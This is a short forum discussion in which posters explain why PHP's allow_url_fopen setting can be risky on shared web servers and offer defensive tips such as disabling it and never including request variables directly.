"Search google. Fopen in itself is not a security risk. Sloppy coding using fopen is."
I guess it's sort of the "guns don't kill people / people kill people" concept. The function itself is not flawed, per-se. However, it's dangerous in the hands of unskilled users. (If you have customers on your web boxes, you'll know not everyone is skilled and/or security minded.)
I believe fopen() is disabled by default with safe_mode on. If not, I'd disable it.
Don't enable it unless you ABSOLUTELY need it (from experience).
If you need it on, then make your code as follows:
1) Don't include() $_POST,$_GET,$_REQUEST vars directly, hardcode a switch($var), that's the safest way.
2) Make that var a CONSTANT if you can, so if something that was in the query string is malicious and tries to change the var, it will fail.
From what I've been reading, this does not have to do with a programmer's script, but, with what a hacker can do if this "allow_url_open" is enabled on a server...
Right, but the option enabled at the server-level dictates what can go into scripts.
To summarize, if you set "allow_url_fopen = Off" it in php.ini you prevent people from FOPENing remote URLs. Opening remote URLs in PHP code is useful, but if user input is anywhere near this function, it must be sanitized sanitized sanitized. Many people who write scripts never bother, so you can disable it altogether globally.
Note this isn't a magic bullet. There are many other dangerous functions. Google for "php disable_functions" for more info.